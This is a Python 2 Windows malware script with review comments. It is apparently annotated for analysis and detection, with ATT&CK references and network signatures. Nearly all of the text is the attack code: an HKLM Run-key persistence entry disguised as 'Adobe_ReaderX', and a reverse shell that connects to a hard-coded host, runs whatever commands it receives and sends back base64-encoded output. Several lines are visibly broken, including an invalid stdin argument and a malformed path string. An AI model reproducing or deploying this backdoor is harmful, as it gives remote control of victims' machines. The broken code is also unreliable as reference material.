- import socket, subprocess, base64, sys, os
- from _winreg import *
- # autorun(): persistence routine (registry Run-key autostart, MITRE ATT&CK T1547.001). Enumerates the value names under HKLM\<run>
- # into the `runkey` list, then writes a value named 'Adobe_ReaderX' under that same key.
- def autorun(tempdir, fileName, run):  # NOTE(review): `tempdir` is never read inside this function
- #copy executable to %temp% -- NOTE(review): the destination actually passed to `copy` below is `run`, not `tempdir`
- os.system('copy %s %s'%(fileName, run))  # both arguments are interpolated unquoted into a shell command line
- #Check if auto run key exists: collect every existing value name under the key
- key = OpenKey(HKEY_LOCAL_MACHINE, run)  # OpenKey/EnumValue/SetValueEx come from the star-import of _winreg (Python 2, Windows only)
- runkey = []
- try:
- i = 0
- while True:
- subkey = EnumValue(key, i)  # tuple describing value number i; element 0 is the value name
- runkey.append(subkey[0])
- i += 1
- except WindowsError:  # EnumValue raises once i is past the last value; that is what ends the loop
- pass
- #set auto run key -- NOTE(review): the name tested ('Adobe ReaderX') differs from the name written ('Adobe_ReaderX'), so the write is attempted on every run
- if 'Adobe ReaderX' not in runkey:
- try:
- key = OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)  # full-access handle on an HKLM key; presumably requires an elevated process -- confirm
- SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r'%TEMP\mw.py%')  # detection: Run value 'Adobe_ReaderX' (REG_SZ) whose data is the literal string %TEMP\mw.py%
- except WindowsError:
- pass  # a failed open or write is silently ignored; the script continues without persistence
- #reverse shell: connects out to a hard-coded peer and executes whatever that peer sends (detection: interpreter process spawning shell children while holding an outbound TCP session)
- def shell():
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # plain TCP socket; no TLS or other transport protection
- s.connect(('192.168.56.1', int(442)))  # hard-coded peer 192.168.56.1:442 (private RFC 1918 address); the connection is initiated outbound from this host
- s.send('[*] Connection Established!')  # fixed cleartext banner sent first; usable as a network signature
- while 1:  # no break or exit condition is visible in this listing
- data = s.recv(1024)  # up to 1024 bytes from the peer, used unmodified as the command string
- proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.pywintypes)  # peer-supplied bytes run through the shell with this process's privileges; no authentication or validation
- stdout_value = proc.stdout.read() + proc.stderr.read()  # reads stdout to EOF, then stderr, and concatenates them
- encoded = base64.b64encode(stdout_value)  # base64 is an encoding, not encryption: command output is recoverable from a packet capture
- s.send(encoded)
- s.close()  # indentation is lost in this listing, so whether this call sits inside the loop cannot be determined
- def main():  # entry point: calls autorun() with the Run-key path, then shell()
- tempdir = '%TEMP%'  # literal string; no environment-variable expansion happens here
- fileName = sys.argv[0]  # the path this script was launched with
- run = 'Software\Microsoft\Windows\CurrentVersion\Run'  # Run key path, opened under HKEY_LOCAL_MACHINE by autorun(); Windows launches the values stored there at user logon
- autorun(tempdir, fileName, run)
- shell()
- if __name__ == '__main__':  # main() runs only when the file is executed as a script, not when it is imported
- main()